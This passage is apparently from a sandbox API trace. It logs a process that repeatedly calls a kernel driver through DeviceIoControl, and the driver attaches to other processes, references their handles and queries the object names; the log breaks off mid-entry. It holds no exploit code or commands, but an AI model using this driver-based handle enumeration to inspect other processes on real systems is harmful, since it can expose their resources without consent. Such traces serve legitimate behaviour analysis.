RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.897] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.897] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.897] PsAcquireProcessExitSynchronization () returned 0x0 [0244.897] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.897] ObReferenceObjectByHandle (in: Handle=0x7d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a1bf20, HandleInformation=0x0) returned 0x0 [0244.897] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.897] PsReleaseProcessExitSynchronization () returned 0x2 [0244.897] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.897] ObQueryNameString (in: Object=0xfffffa8003a1bf20, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.897] ObfDereferenceObject (Object=0xfffffa8003a1bf20) returned 0x1 [0244.897] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.898] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.898] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.898] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x22, lpOverlapped=0x0) returned 1 [0244.898] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.898] PsAcquireProcessExitSynchronization () returned 0x0 [0244.898] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.898] ObReferenceObjectByHandle (in: Handle=0x7f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a1cc80, HandleInformation=0x0) returned 0x0 [0244.898] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.898] PsReleaseProcessExitSynchronization () returned 0x2 [0244.898] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.898] ObQueryNameString (in: Object=0xfffffa8003a1cc80, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.898] ObfDereferenceObject (Object=0xfffffa8003a1cc80) returned 0x1 [0244.898] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.898] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.898] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.898] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.898] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.898] PsAcquireProcessExitSynchronization () returned 0x0 [0244.898] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.898] ObReferenceObjectByHandle (in: Handle=0x8fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034d13f0, HandleInformation=0x0) returned 0x0 [0244.898] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.898] PsReleaseProcessExitSynchronization () returned 0x2 [0244.898] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.898] ObQueryNameString (in: Object=0xfffffa80034d13f0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.898] ObfDereferenceObject (Object=0xfffffa80034d13f0) returned 0x2 [0244.898] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.898] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.899] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.899] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0244.899] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.899] PsAcquireProcessExitSynchronization () returned 0x0 [0244.899] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.899] ObReferenceObjectByHandle (in: Handle=0x954, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003992f20, HandleInformation=0x0) returned 0x0 [0244.899] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.899] PsReleaseProcessExitSynchronization () returned 0x2 [0244.899] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.899] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.899] ObfDereferenceObject (Object=0xfffffa8003992f20) returned 0x12 [0244.899] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.899] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.899] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.899] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0244.899] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.899] PsAcquireProcessExitSynchronization () returned 0x0 [0244.899] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.899] ObReferenceObjectByHandle (in: Handle=0x958, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003992210, HandleInformation=0x0) returned 0x0 [0244.899] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.899] PsReleaseProcessExitSynchronization () returned 0x2 [0244.899] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.899] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.899] ObfDereferenceObject (Object=0xfffffa8003992210) returned 0x12 [0244.899] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.899] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.899] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.899] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0244.899] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.899] PsAcquireProcessExitSynchronization () returned 0x0 [0244.900] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.900] ObReferenceObjectByHandle (in: Handle=0x95c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003992530, HandleInformation=0x0) returned 0x0 [0244.900] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.900] PsReleaseProcessExitSynchronization () returned 0x2 [0244.900] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.900] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.900] ObfDereferenceObject (Object=0xfffffa8003992530) returned 0x12 [0244.900] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.900] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.900] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.900] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0244.900] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.900] PsAcquireProcessExitSynchronization () returned 0x0 [0244.900] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.900] ObReferenceObjectByHandle (in: Handle=0x960, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003992680, HandleInformation=0x0) returned 0x0 [0244.900] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.900] PsReleaseProcessExitSynchronization () returned 0x2 [0244.900] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.900] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.900] ObfDereferenceObject (Object=0xfffffa8003992680) returned 0x10 [0244.900] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.900] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.900] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.900] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0244.900] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.900] PsAcquireProcessExitSynchronization () returned 0x0 [0244.900] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.900] ObReferenceObjectByHandle (in: Handle=0x964, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039923e0, HandleInformation=0x0) returned 0x0 [0244.900] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.900] PsReleaseProcessExitSynchronization () returned 0x2 [0244.900] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.901] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.901] ObfDereferenceObject (Object=0xfffffa80039923e0) returned 0x18 [0244.901] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.901] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.901] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.901] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.901] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.901] PsAcquireProcessExitSynchronization () returned 0x0 [0244.901] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.901] ObReferenceObjectByHandle (in: Handle=0x9a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034b7070, HandleInformation=0x0) returned 0x0 [0244.901] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.901] PsReleaseProcessExitSynchronization () returned 0x2 [0244.901] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.901] ObQueryNameString (in: Object=0xfffffa80034b7070, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.901] ObfDereferenceObject (Object=0xfffffa80034b7070) returned 0x1 [0244.901] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.901] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.901] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.901] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.901] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.901] PsAcquireProcessExitSynchronization () returned 0x0 [0244.901] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.901] ObReferenceObjectByHandle (in: Handle=0xa78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034f5070, HandleInformation=0x0) returned 0x0 [0244.901] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.901] PsReleaseProcessExitSynchronization () returned 0x2 [0244.901] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.901] ObQueryNameString (in: Object=0xfffffa80034f5070, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.901] ObfDereferenceObject (Object=0xfffffa80034f5070) returned 0x1 [0244.901] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.902] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.902] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.902] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0244.902] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.902] PsAcquireProcessExitSynchronization () returned 0x0 [0244.902] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.902] ObReferenceObjectByHandle (in: Handle=0xba0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a2b960, HandleInformation=0x0) returned 0x0 [0244.902] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.902] PsReleaseProcessExitSynchronization () returned 0x2 [0244.902] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.902] ObQueryNameString (in: Object=0xfffffa8003a2b960, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.902] ObfDereferenceObject (Object=0xfffffa8003a2b960) returned 0x1 [0244.902] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.107] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.107] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.107] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.107] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.107] PsAcquireProcessExitSynchronization () returned 0x0 [0245.107] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0245.108] ObReferenceObjectByHandle (in: Handle=0xef4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800216b3b0, HandleInformation=0x0) returned 0x0 [0245.108] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.108] PsReleaseProcessExitSynchronization () returned 0x2 [0245.108] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0245.108] ObQueryNameString (in: Object=0xfffffa800216b3b0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.108] ObfDereferenceObject (Object=0xfffffa800216b3b0) returned 0x2 [0245.108] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.108] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.108] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.108] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0245.108] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.108] PsAcquireProcessExitSynchronization () returned 0x0 [0245.108] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0245.108] ObReferenceObjectByHandle (in: Handle=0x1048, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002872240, HandleInformation=0x0) returned 0x0 [0245.108] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.108] PsReleaseProcessExitSynchronization () returned 0x2 [0245.108] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0245.109] ObQueryNameString (in: Object=0xfffffa8002872240, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.109] ObfDereferenceObject (Object=0xfffffa8002872240) returned 0x2 [0245.109] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.109] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0245.109] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.109] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.109] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.109] PsAcquireProcessExitSynchronization () returned 0x0 [0245.109] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880053c85d0) [0245.109] ObReferenceObjectByHandle (in: Handle=0x8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003847900, HandleInformation=0x0) returned 0x0 [0245.109] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.109] PsReleaseProcessExitSynchronization () returned 0x2 [0245.109] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3a [0245.109] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.109] ObfDereferenceObject (Object=0xfffffa8003847900) returned 0x1 [0245.109] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.109] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.109] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.109] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0245.110] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.110] PsAcquireProcessExitSynchronization () returned 0x0 [0245.110] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880053c85d0) [0245.110] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003848c40, HandleInformation=0x0) returned 0x0 [0245.110] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.110] PsReleaseProcessExitSynchronization () returned 0x2 [0245.110] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3a [0245.110] ObQueryNameString (in: Object=0xfffffa8003848c40, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.110] ObfDereferenceObject (Object=0xfffffa8003848c40) returned 0x11 [0245.110] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.110] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.110] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.110] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, 